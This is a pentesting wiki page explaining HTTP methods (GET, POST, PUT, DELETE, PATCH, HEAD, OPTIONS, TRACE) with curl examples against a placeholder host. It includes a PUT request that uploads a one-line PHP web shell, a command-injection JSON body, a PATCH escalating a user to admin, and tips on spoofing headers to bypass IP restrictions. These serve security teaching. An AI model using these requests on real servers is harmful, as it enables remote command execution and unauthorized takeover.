Making HTTP Requests

From HackOps
Jump to navigation Jump to search

Making HTTP Requests[edit | edit source]

Introduction[edit | edit source]

HTTP requests are used to interact with web servers by requesting data, submitting forms, uploading files, or modifying resources. Understanding how each method works enables deeper interaction with web applications and can expose misconfigurations or unintended functionality.

This page outlines how common HTTP methods are used in practice, with real-world examples suitable for exploration and testing.

GET[edit | edit source]

The GET method is used to retrieve data from a server. It appends parameters to the URL and leaves traces in logs and browser history.

Usage Example

curl 'http://target.site/profile?id=1337'

Notes

  • Used for parameter enumeration (?id=1, ?id=2, ...)
  • Reflected and stored XSS often triggered via GET
  • Sensitive data in GET can be exposed in logs or referers

POST[edit | edit source]

The POST method submits data to the server in the request body. It’s used in login forms, registration, comment submission, and more.

Usage Example (Form Login)

curl -X POST http://target.site/login \
 -H "Content-Type: application/x-www-form-urlencoded" \
 --data "username=admin&password=admin"

Usage Example (JSON)

curl -X POST http://target.site/api \
 -H "Content-Type: application/json" \
 -d '{"cmd":"whoami"}'

Notes

  • Hidden parameters or roles often sent in POST
  • Commonly used for SQL injection and command injection
  • Some endpoints accept both GET and POST (test both)

PUT[edit | edit source]

PUT is used to upload or replace resources. When enabled and not restricted, it may allow file upload attacks.

Usage Example (upload PHP shell)

curl -X PUT http://target.site/uploads/shell.php \
 --data '<?php system($_GET["cmd"]); ?>'

Notes

  • Rarely enabled on production servers
  • Can be used to gain arbitrary file write if not locked down
  • Test using OPTIONS method to check for support

DELETE[edit | edit source]

DELETE requests are meant to remove resources. While often blocked or protected, it can be misconfigured and abused.

Usage Example

curl -X DELETE http://target.site/api/users/42

Notes

  • May not require authentication in misconfigured APIs
  • If unauthenticated DELETE is accepted, privilege escalation or DoS may be possible

PATCH[edit | edit source]

PATCH modifies part of a resource instead of replacing the whole. Seen in APIs that allow editing.

Usage Example

curl -X PATCH http://target.site/api/user/42 \
 -H "Content-Type: application/json" \
 -d '{"role":"admin"}'

Notes

  • Can be used to escalate privileges in improperly secured APIs
  • Input validation should always be tested

HEAD[edit | edit source]

HEAD requests are identical to GET but return only headers. Useful for checking if a file exists or for recon.

Usage Example

curl -I http://target.site/admin.php

Notes

  • Useful for testing resource existence without downloading content
  • Can bypass some security tools that ignore HEAD requests

OPTIONS[edit | edit source]

OPTIONS asks the server what methods are allowed on a given endpoint.

Usage Example

curl -X OPTIONS http://target.site/api/

Notes

  • Helps detect hidden endpoints or misconfigured CORS policies
  • Can reveal support for PUT, DELETE, etc.
  • Some APIs respond differently based on user-agent

TRACE[edit | edit source]

TRACE echoes the request back to the client. It can be abused in some edge-case attacks like Cross Site Tracing (XST).

Usage Example

curl -X TRACE http://target.site

Notes

  • Rarely enabled
  • If active, can reflect headers (e.g., cookies) in response

Common Headers to Use in Requests[edit | edit source]

Header Description
Host Target domain
User-Agent Client identity, can be spoofed
Referer Previous page, can be manipulated
Origin Cross-origin indicator (CORS)
Authorization Basic or Bearer tokens
Content-Type Declares body format (form, JSON, XML)
Cookie Session identifier injection
X-Forwarded-For Spoofed IP for bypassing IP-based restrictions

Tools for Crafting Requests[edit | edit source]

Tool Use Case Notes
curl All HTTP methods Lightweight, scriptable
httpie Human-readable requests Easier syntax than curl
Burp Suite Intercept & modify requests GUI + repeater
OWASP ZAP Automated scanning + proxy Supports scripting
Postman API testing & automation GUI-based

See also[edit | edit source]

  • /HTTP_Protocols
  • Headers
  • Cookies_and_Sessions
  • curl
  • Bypassing_Authentication
  • Content_Discovery